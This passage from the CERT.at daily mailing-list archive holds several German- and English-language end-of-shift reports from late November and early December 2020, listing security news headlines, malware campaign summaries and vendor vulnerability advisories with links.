attacker can obtain on the victim the greater the chances for a successful exploitation and infiltration. Recently, we uncovered two information disclosure vulnerabilities affecting three of the major web browsers which can be leveraged to leak out a vast range of installed applications, including the presence of security products, allowing a threat actor to gain critical insights on the target. --------------------------------------------- https://www.fortinet.com/blog/threat-research/leaking-browser-url-protocol-… ===================== = Vulnerabilities = ===================== ∗∗∗ VMware Releases Security Updates to Address CVE-2020-4006 ∗∗∗ --------------------------------------------- VMware has released security updates to address a vulnerability—CVE-2020-4006—in VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector. An attacker could exploit this vulnerability to take control of an affected system. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2020-0027.2 and apply the necessary updates. --------------------------------------------- https://us-cert.cisa.gov/ncas/current-activity/2020/12/03/vmware-releases-s… ∗∗∗ Webserver-Sicherheitslücke: Heikle Konfigurations- und Statusdaten publiziert ∗∗∗ --------------------------------------------- Fehlkonfigurierte Webserver von Bundesbehörden und IT-Firmen präsentierten Besucher-IPs, Benutzernamen, Meeting-Kennungen und mehr offen im Internet. --------------------------------------------- https://heise.de/-4971830 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (thunderbird), Fedora (c-ares, pdfresurrect, webkit2gtk3, and xen), openSUSE (python3), SUSE (gdm, python-pip, rpmlint, and xen), and Ubuntu (snapcraft). --------------------------------------------- https://lwn.net/Articles/838960/ ∗∗∗ WECON LeviStudioU (Update C) ∗∗∗ --------------------------------------------- This updated advisory is a follow-up to the advisory update titled ICSA-20-238-03 WECON LeviStudioU (Update B) that was published October 29, 2020, to the ICS webpage on us-cert.cisa.gov. This advisory contains mitigations for a Stack-based Buffer Overflow vulnerability in the WECON Technology LeviStudioU software. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-238-03 ∗∗∗ Apache Tomcat: Schwachstelle ermöglicht Offenlegung von Informationen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1195 ∗∗∗ Security Advisory - Privilege Escalation Vulnerability in Huawei Smartphone ∗∗∗ --------------------------------------------- https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201202… ∗∗∗ Security Advisory - Resource Management Error Vulnerability in Huawei CloudEngine 1800V Product ∗∗∗ --------------------------------------------- https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201202… ∗∗∗ Intel CPU vulnerability CVE-2020-0591 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K82356391 ∗∗∗ Intel CPU vulnerability CVE-2020-0592 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K04160444 ∗∗∗ QEMU vulnerability CVE-2020-27617 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K41142448 ∗∗∗ Jetty vulnerability CVE-2019-10247 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K41412302 ∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Program Management (CVE-2020-11023, CVE-2020-11022) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af… ∗∗∗ Security Bulletin: Trusteer Mobile SDK is vulnerable to CVE-2019-17362 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-trusteer-mobile-sdk-is-vu… ∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Sourcing (CVE-2020-11023, CVE-2020-11022) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af… ∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Contract Management (CVE-2020-11023, CVE-2020-11022) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af… ∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Spend Analysis (CVE-2020-11023, CVE-2020-11022) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af… ∗∗∗ Security Bulletin: IBM API Connect is vulnerable to arbitrary code execution and security bypass in Drupal (CVE-2020-13664, CVE-2020-13665) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-vulner… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Watson Explorer and Watson Explorer Content Analytics Studio (CVE-2020-14579, CVE-2020-14578, CVE-2020-14577, CVE-2020-14621) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: jQuery Vulnerabilities Affect IBM Emptoris Strategic Supply Management Platform (CVE-2020-11023, CVE-2020-11022) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-jquery-vulnerabilities-af… ∗∗∗ Security Bulletin: Multiple security vulnerabilities with IBM Content Navigator component in IBM Business Automation Workflow – CVE-2020-4687, CVE-2020-4760, CVE-2020-4704 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: Upgrade javaenv:2.2 to address Gradle oauth authentication concerns. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-upgrade-javaenv2-2-to-add… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 03.12.2020
by Daily end-of-shift report 03 Dec '20

03 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 02-12-2020 18:00 − Donnerstag 03-12-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ APT-Gruppen: Turla und Co. tarnen Angriffe durch scheinbar harmlose Aktivitäten ∗∗∗ --------------------------------------------- Eine Spionage-Malware der wohl staatlich finanzierten Turla-Gang setzt auf Dropbox zum Datenklau. In einem anderen Fall verschleierte Coin-Mining Schlimmeres. --------------------------------------------- https://heise.de/-4978541 ∗∗∗ Studie: Schwachstellen in Open-Source-Software bleiben in der Regel vier Jahre unentdeckt ∗∗∗ --------------------------------------------- Patches stehen in der Regel innerhalb von vier Wochen zur Verfügung. Zudem sind nur 17 Prozent der registrierten Sicherheitslücken als "schädlich" einzustufen. GitHub sieht Open-Source-Software als "kritische Infrastruktur" an. --------------------------------------------- https://www.zdnet.de/88390280/studie-schwachstellen-in-open-source-software… ∗∗∗ What did DeathStalker hide between two ferns? ∗∗∗ --------------------------------------------- While tracking DeathStalker’s Powersing-based activities in May 2020, we detected a previously unknown implant that leveraged DNS over HTTPS as a C2 channel, as well as parts of its delivery chain. We named this new malware "PowerPepper". --------------------------------------------- https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/ ∗∗∗ Xerox DocuShare Bugs Allow Data Leaks ∗∗∗ --------------------------------------------- CISA warns the leading enterprise document management platform is open to attack and urges companies to apply fixes. --------------------------------------------- https://threatpost.com/xerox-docushare-bugs/161791/ ∗∗∗ Another LILIN DVR 0-day being used to spread Mirai ∗∗∗ --------------------------------------------- In March, we reported[1] that multiple botnets, including Chalubo, Fbot, Moobot were using a same 0 day vulnerability to attack LILIN DVR devices, the vendor soon fixed the vulnerability. On August 26, 2020, our Anglerfish honeypot detected that another new LILINDVR/ [...] --------------------------------------------- https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mi… ∗∗∗ Adventures in Anti-Gravity (Part II) ∗∗∗ --------------------------------------------- Here we continue to deconstruct a Mac variant of GravityRAT (the cross-platform spyware, known to target the Indian armed forces), focusing on its Electron component. --------------------------------------------- https://objective-see.com/blog/blog_0x5C.html ∗∗∗ TrickBot Malware Gets UEFI/BIOS Bootkit Feature to Remain Undetected ∗∗∗ --------------------------------------------- TrickBot, one of the most notorious and adaptable malware botnets in the world, is expanding its toolset to set its sights on firmware vulnerabilities to potentially deploy bootkits and take complete control of an infected system. The new functionality, dubbed "TrickBoot" by Advanced Intelligence (AdvIntel) and Eclypsium, makes use of readily available tools to check devices for well-known [...] --------------------------------------------- https://thehackernews.com/2020/12/trickbot-malware-gets-uefibios-bootkit.ht… ∗∗∗ Spamhaus Intelligence API: Free threat intelligence data for security developers ∗∗∗ --------------------------------------------- Spamhaus Technology releases its Intelligence API. This is the first time Spamhaus has released its extensive threat intelligence via API, providing enriched data relating to IP addresses exhibiting compromised behaviour. Available free of charge, developers can readily access enhanced data that catalogues IP addresses compromised by malware, worms, Trojan infections, devices controlled by botnets, and third party exploits, such as open proxies. The API features live and historical data, [...] --------------------------------------------- https://www.helpnetsecurity.com/2020/12/03/spamhaus-intelligence-api/ ∗∗∗ Open Source Tool Helps Secure Siemens PCS 7 Control Systems ∗∗∗ --------------------------------------------- Industrial cybersecurity company OTORIO has released an open source tool designed to help organizations harden Siemens’ SIMATIC PCS 7 distributed control systems (DCS). --------------------------------------------- https://www.securityweek.com/open-source-tool-helps-secure-siemens-pcs-7-co… ===================== = Vulnerabilities = ===================== ∗∗∗ Google Play Apps Remain Vulnerable to High-Severity Flaw ∗∗∗ --------------------------------------------- Patches for a flaw (CVE-2020-8913) in the Google Play Core Library have not been implemented by several popular Google Play apps, including Cisco Teams and Edge. --------------------------------------------- https://threatpost.com/google-play-apps-remain-vulnerable-to-high-severity-… ∗∗∗ iCloud for Windows 11.5 ∗∗∗ --------------------------------------------- Foundation: A local user may be able to read arbitrary files ImageIO: Processing a maliciously crafted image may lead to arbitrary code execution ImageIO: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution libxml2: Processing maliciously crafted web content may lead to code execution libxml2: A remote attacker may be able to cause unexpected application termination or arbitrary code execution libxml2: Processing a maliciously crafted file may lead to arbitrary code execution SQLite: A remote attacker may be able to cause a denial of service SQLite: A remote attacker may be able to cause arbitrary code execution SQLite: A remote attacker may be able to leak memory SQLite: A maliciously crafted SQL query may lead to data corruption WebKit: Processing maliciously crafted web content may lead to arbitrary code execution --------------------------------------------- https://support.apple.com/kb/HT211935 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Mageia (cimg, pngcheck, poppler, tor, and xdg-utils), openSUSE (mariadb), Red Hat (go-toolset-1.14-golang), and Ubuntu (linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-gke-4.15, linux-hwe, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon). --------------------------------------------- https://lwn.net/Articles/838870/ ∗∗∗ Mozilla Foundation Security Advisory 2020-53 ∗∗∗ --------------------------------------------- In security advisory 2020-53, the Mozilla Foundation describes a stack overflow vulnerability (CVE-2020-26970) patched in Thunderbird 78.5.1. The issue was caused by writing an SMTP server status integer value on the stack designed to only hold one byte. This could potentially corrupt the stack which might be exploitable. --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/0f933021879b159a96ec2380843… ∗∗∗ Red Hat Enterprise Linux: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1190 ∗∗∗ Security Bulletin: Vulnerability in PyYAML affects IBM Spectrum Protect Plus Container and Microsoft File Systems Agents (CVE-2020-1747) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-pyyaml-a… ∗∗∗ Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by a 3rd party cryptographc vulnerability (CVE-2020-4254) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-big… ∗∗∗ Security Bulletin: A security bypass vulnerability in Apache Solr (lucene) affects IBM InfoSphere Information Server ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-bypass-vulnera… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java affect IBM Netezza Analytics ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple security vulnerabilities with Administration Console for Content Platform Engine component in IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4447, CVE-2020-4759 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 02.12.2020
by Daily end-of-shift report 02 Dec '20

02 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 01-12-2020 18:00 − Mittwoch 02-12-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Project Zero: Exploit zeigt Komplettübernahme von iPhones per WLAN ∗∗∗ --------------------------------------------- Ohne Bugfix hätten iPhones vollständig per WLAN ausgelesen werden können - über eine triviale Lücke. Apple hat den Fehler bereits behoben. --------------------------------------------- https://www.golem.de/news/project-zero-exploit-zeigt-komplettuebernahme-von… ∗∗∗ "Free" Symchanger Malware Tricks Users Into Installing Backdoor ∗∗∗ --------------------------------------------- In a previous post, I discussed how attackers can trick website owners into installing malware onto a website - granting the attacker the same unauthorized access as if they had exploited a vulnerability or compromised login details for the website. But did you know attackers use the same tactic against other bad actors? They do this by offering free malware, even going to great lengths to include a guide on how to use it. --------------------------------------------- https://blog.sucuri.net/2020/12/free-symchanger-malware-tricks-users-into-i… ∗∗∗ Remote Code Execution: Lücken in NAS-Betriebssystem QTS von Qnap geschlossen ∗∗∗ --------------------------------------------- Die Qnap-Entwickler haben eine abgesicherte Version von QTS für NAS-Geräte aus dem eigenen Haus veröffentlicht. --------------------------------------------- https://heise.de/-4977592 ∗∗∗ Paketmanager npm: Remote Access Trojan tarnt sich als JSON-Tool ∗∗∗ --------------------------------------------- Die zwei Pakete jdb.js und db-json.js versuchen njRAT zu installieren und die Windows-Firewall passend zu öffnen. --------------------------------------------- https://heise.de/-4977572 ∗∗∗ Zahlreiche betrügerische Jobangebote von rareAI und enixAI online! ∗∗∗ --------------------------------------------- „Quereinsteiger im KI-Training“ oder „Datenerfasser/KI-Trainer“ – so oder so ähnlich klingen betrügerische Jobangebote, die derzeit auf zahlreichen Plattformen inseriert werden. Dahinter stecken die angeblichen Start-Ups rareAI oder enixAI. Doch weder die Unternehmen existieren erhalten Interessierte eine bezahlte Arbeit. Stattdessen wird der Bewerbungsprozess genutzt, um im Namen der Opfer ein Konto zu eröffnen, nebenbei klauen die Kriminellen noch [...] --------------------------------------------- https://www.watchlist-internet.at/news/zahlreiche-betruegerische-jobangebot… ===================== = Vulnerabilities = ===================== ∗∗∗ ICS Advisory (ICSA-20-336-01) Schneider Electric EcoStruxure Operator Terminal Expert runtime (Vijeo XD) ∗∗∗ --------------------------------------------- Successful exploitation of this vulnerability may allow unauthorized command execution by a local user of the Windows engineering workstation, which could result in loss of availability, confidentiality, and integrity of the workstation where EcoStruxure Operator Terminal Expert runtime is installed. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-336-01 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (brotli, jupyter-notebook, and postgresql-9.6), Fedora (perl-Convert-ASN1 and php-pear), openSUSE (go1.15, libqt5-qtbase, mutt, python-setuptools, and xorg-x11-server), Oracle (firefox, kernel, libvirt, and thunderbird), Red Hat (rh-postgresql10-postgresql and rh-postgresql12-postgresql), SUSE (java-1_8_0-openjdk, python, python-cryptography, python-setuptools, python3, and xorg-x11-server), and Ubuntu (linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-kvm, linux-oracle, linux-oracle-5.4, linux, linux-aws, linux-azure, linux-gcp, linux-kvm, linux-oracle, linux-raspi, linux, linux-aws, linux-azure, linux-kvm, linux-lts-trusty, linux-raspi2, linux-snapdragon, python-werkzeug, and xorg-server, xorg-server-hwe-16.04, xorg-server-hwe-18.04). --------------------------------------------- https://lwn.net/Articles/838786/ ∗∗∗ Security Advisory - Privilege Escalation Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201202… ∗∗∗ HCL Domino: Schwachstelle ermöglicht Ausführen von beliebigem Programmcode mit den Rechten des Dienstes ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1182 ∗∗∗ FreeBSD: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1185 ∗∗∗ McAfee Total Protection: Schwachstelle ermöglicht Privilegieneskalation ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1184 ∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java SDK affect IBM Virtualization Engine TS7700 – July 2020 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in firmware supporting products shipped with IBM Clouf Pak System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: CVE-2020-26217 XStream before version 1.4.14 is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-26217-xstream-be… ∗∗∗ Security Bulletin: Multiple security vulnerabilities with Administration Console for Content Platform Engine component in IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4447, CVE-2020-4459 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 01.12.2020
by Daily end-of-shift report 01 Dec '20

01 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Montag 30-11-2020 18:00 − Dienstag 01-12-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Banking-Malware Gootkit ist zurück und hat es auf PCs in Deutschland abgesehen ∗∗∗ --------------------------------------------- Das CERT-Bund und verschiedene Sicherheitsforscher warnen vor Trojaner-Attacken. Infektionen sind aber nicht ohne Weiteres möglich. --------------------------------------------- https://heise.de/-4976043 ∗∗∗ FBI warns of BEC scammers using email auto-forwarding in attacks ∗∗∗ --------------------------------------------- The FBI is warning U.S. companies about scammers actively abusing auto-forwarding rules on web-based email clients to increase the likelihood of successful Business Email Compromise (BEC) attacks. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fbi-warns-of-bec-scammers-us… ∗∗∗ Critical Oracle WebLogic flaw actively exploited by DarkIRC malware ∗∗∗ --------------------------------------------- A botnet known as DarkIRC is actively targeting thousands of exposed Oracle WebLogic servers in attacks designed to exploit the CVE-2020-14882 remote code execution (RCE) vulnerability fixed by Oracle two months ago. --------------------------------------------- https://www.bleepingcomputer.com/news/security/critical-oracle-weblogic-fla… ∗∗∗ IceRat evades antivirus by running PHP on Java VM ∗∗∗ --------------------------------------------- IceRat keeps low detections rates for weeks by using an unusual language implementation: JPHP. But there are more reasons than the choice of the compiler. This article explores IceRat and explains a way to analyze JPHP malware. --------------------------------------------- https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp ∗∗∗ How prevalent is DNS spoofing? Could a repeat of the Dyn/Mirai DDoS attack have the same results? ∗∗∗ --------------------------------------------- Two separate groups of academics have recently released research papers based on research into the Domain Name System (DNS). One has found that the overwhelming majority of popular site operators haven’t learned from the 2016 Dyn/Mirai incident/attack and set up a backup DNS server, and the other has shown that the rate of DNS spoofing, though still very small, has more than doubled in less than seven years. --------------------------------------------- https://www.helpnetsecurity.com/2020/12/01/dns-spoofing/ ∗∗∗ Xanthe - Docker aware miner ∗∗∗ --------------------------------------------- Ransomware attacks and big-game hunting making the headlines, but adversaries use plenty of other methods to monetize their efforts in less intrusive ways. Cisco Talos recently discovered a cryptocurrency-mining botnet attack were calling "Xanthe," which attempted to compromise one of Ciscos security honeypots for tracking Docker-related threats. --------------------------------------------- https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html ∗∗∗ Docker malware is now common, so devs need to take Docker security seriously ∗∗∗ --------------------------------------------- Three years after the first malware attacks targeting Docker, developers are still misconfiguring and exposing their Docker servers online. --------------------------------------------- https://www.zdnet.com/article/docker-malware-is-now-common-so-devs-need-to-… ===================== = Vulnerabilities = ===================== ∗∗∗ GO SMS Pro Vulnerable to File Theft: Part 2 ∗∗∗ --------------------------------------------- Last week we released an advisory about an SMS app called GO SMS Pro. Media files sent via text in the app are stored insecurely on a publicly accessible server. With some very minor scripting, it is trivial to throw a wide net around that content. While its not directly possible to link the media to specific users, those media files with faces, names, or other identifying characteristics do that for you. [...] It seems like GOMO is attempting to fix the issue, but a complete fix is still not available in the app. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/go-sms-pro-… ∗∗∗ Multiple (RCE) Vulnerabilities in Micro Focus Operations Bridge Manager ∗∗∗ --------------------------------------------- After analysing OBM, I found a mountain of critical security vulnerabilities that when combined result in a complete compromise of the application: - Use of Hard-coded Credentials - Insecure Java Deserialization (an incredible total of 41 of them) - Use of Outdated and Insecure Java Libraries - Incorrect Default Folder Permissions (resulting in Privilege Escalation to SYSTEM) All of these vulnerabilities affect the latest version, 2020.05, and possibly earlier versions. Both Windows and Linux installations are affected, except for the privilege escalation, which only affects Windows. --------------------------------------------- https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focu… ∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2020-0009 ∗∗∗ --------------------------------------------- Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. [...] Impact: Processing maliciously crafted web content may lead toarbitrary code execution. --------------------------------------------- https://webkitgtk.org/security/WSA-2020-0009.html ∗∗∗ QNAP QTS: Mehrere Schwachstellen ermöglichen Codeausführung ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1181 ∗∗∗ Foxit Phantom PDF Suite: Schwachstelle ermöglicht nicht spezifizierten Angriff ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1180 ∗∗∗ HCL Domino: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1177 ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a buffer overflow (CVE-2020-4701) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: Information disclosure vulnerability may affect IBM Business Automation Workflow – CVE-2020-4900 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu… ∗∗∗ Security Bulletin: Node.js upgrade for IBM Cloud Pak for Data Streams Flows ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-node-js-upgrade-for-ibm-c… ∗∗∗ Security Bulletin: Node.js module upgrade for IBM Cloud Pak for Data Streams Flows ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-node-js-module-upgrade-fo… ∗∗∗ Security Bulletin: Multiple Security Vulnerabilities in IBM WebSphere Application Server affects IBM Voice Gateway ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: A security vulnerability in Node.js affects IBM Voice Gateway ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: Node.js upgrade for IBM Cloud Pak for Data Streams Flows ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-node-js-upgrade-for-ibm-c… ∗∗∗ Security Bulletin: Multiple security vulnerabilities in IBM Java SDK affects IBM Voice Gateway ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: IBM® Db2® could allow a local authenticated attacker to execute arbitrary code on the system, caused by DLL search order hijacking vulnerability in Microsoft Windows client. (CVE-2020-4739) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-could-allow-a-loc… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.11.2020
by Daily end-of-shift report 30 Nov '20

30 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 27-11-2020 18:00 − Montag 30-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Bug oder Feature: Privilege Escalation in Windows Autopilot ∗∗∗ --------------------------------------------- SEC Consult hat im Deploymentprozess von Windows Autopilot eine Schwachstelle identifziert, die eine Erweiterung lokaler Berechtigungen ermöglicht. --------------------------------------------- https://www.sec-consult.com/./blog/2020/11/bug-oder-feature-privilege-escal… ∗∗∗ Credit card skimmer fills fake PayPal forms with stolen order info ∗∗∗ --------------------------------------------- A newly discovered credit card skimmer uses an innovative technique to inject highly convincing PayPal iframes and hijack the checkout process on compromised online stores. --------------------------------------------- https://www.bleepingcomputer.com/news/security/credit-card-skimmer-fills-fa… ∗∗∗ Cyberthreats to financial organizations in 2021 ∗∗∗ --------------------------------------------- Let us review the forecasts we made at the end of 2019 and see how accurate we were. Then we will go through the key events of 2020 relating to financial attacks. Finally, we need to make a forecast of financial attacks in 2021. --------------------------------------------- https://securelist.com/cyberthreats-to-financial-organizations-in-2021/9959… ∗∗∗ Threat Hunting with JARM, (Fri, Nov 27th) ∗∗∗ --------------------------------------------- Recently I have been testing a new tool created by the people at Salesforce. The tool is called JARM and what it does is query TLS instances (HTTPS servers and services) to create a fingerprint of their TLS configuration. Much like analyzing the nuances of network traffic can be used to fingerprint the operating system and version of a server, JARM fingerprints TLS instances to create a fingerprint which can be used to compare one TLS service to another. --------------------------------------------- https://isc.sans.edu/diary/rss/26832 ∗∗∗ German users targeted with Gootkit banker or REvil ransomware ∗∗∗ --------------------------------------------- After a noted absence, the Gootkit banking Trojan returns en masse to hit Germany. In an interesting twist, some of the victims may receive ransomware instead. --------------------------------------------- https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted… ∗∗∗ SD-WAN Product Vulnerabilities Allow Hackers to Steer Traffic, Shut Down Networks ∗∗∗ --------------------------------------------- Researchers at cybersecurity consulting firm Realmode Labs have identified vulnerabilities in SD-WAN products from Silver Peak, Cisco, Citrix and VMware, including potentially serious flaws that can be exploited to steer traffic or completely shut down an organization’s network. --------------------------------------------- https://www.securityweek.com/sd-wan-product-vulnerabilities-allow-hackers-s… ∗∗∗ Tens of Dormant North American Networks Suspiciously Resurrected at Once ∗∗∗ --------------------------------------------- More than fifty networks in the North American region suddenly burst to life after being dormant for a long period of time, Spamhaus reveals. The Geneva-based international nonprofit organization is focused on tracking spam, phishing, malware, and botnets, and provides threat intelligence that can help filter spam and related threats. --------------------------------------------- https://www.securityweek.com/tens-dormant-north-american-networks-suspiciou… ∗∗∗ Hackers are targeting MacOS users with this updated malware ∗∗∗ --------------------------------------------- Researchers link new malware attacks designed to install a backdoor onto compromised systems to Vietnamese-backed hacking operation OceanLotus. --------------------------------------------- https://www.zdnet.com/article/hackers-are-targeting-macos-users-with-this-u… ∗∗∗ Whac-A-Mole: Six Years of DNS Spoofing. (arXiv:2011.12978v1 [cs.CR]) ∗∗∗ --------------------------------------------- DNS is important in nearly all interactions on the Internet. All large DNS operators use IP anycast, announcing servers in BGP from multiple physical locations to reduce client latency and provide capacity. However, DNS is easy to spoof: third parties intercept and respond to queries for benign or malicious purposes. Spoofing is of particular risk for services using anycast, since service is already announced from multiple origins. --------------------------------------------- http://arxiv.org/abs/2011.12978 ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitsupdate: Lücke in Trend Micro ServerProtect gefährdet Linux-Systeme ∗∗∗ --------------------------------------------- Es gibt eine abgesicherte Version von Trend Micro ServerProtect for Linux. --------------------------------------------- https://heise.de/-4974321 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (c-ares, libass, raptor, rclone, and swtpm), Debian (libproxy, qemu, tcpflow, and x11vnc), Fedora (asterisk, c-ares, microcode_ctl, moodle, pam, tcpdump, and webkit2gtk3), Mageia (jruby and webkit2), openSUSE (buildah, c-ares, ceph, fontforge, java-1_8_0-openjdk, kernel, LibVNCServer, mariadb, thunderbird, ucode-intel, and wireshark), Red Hat (firefox, rh-mariadb103-mariadb and rh-mariadb103-galera, and thunderbird), SUSE (binutils, libssh2_org, [...] --------------------------------------------- https://lwn.net/Articles/838579/ ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects TXSeries for Multiplatforms ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: IBM QRadar Network Security is affected by Network Time Protocol (NTP) vulnerabilities (CVE-2020-11868, CVE-2020-13817) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-network-securi… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects TXSeries for Multiplatforms ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affect IBM Content Classification ∗∗∗ --------------------------------------------- 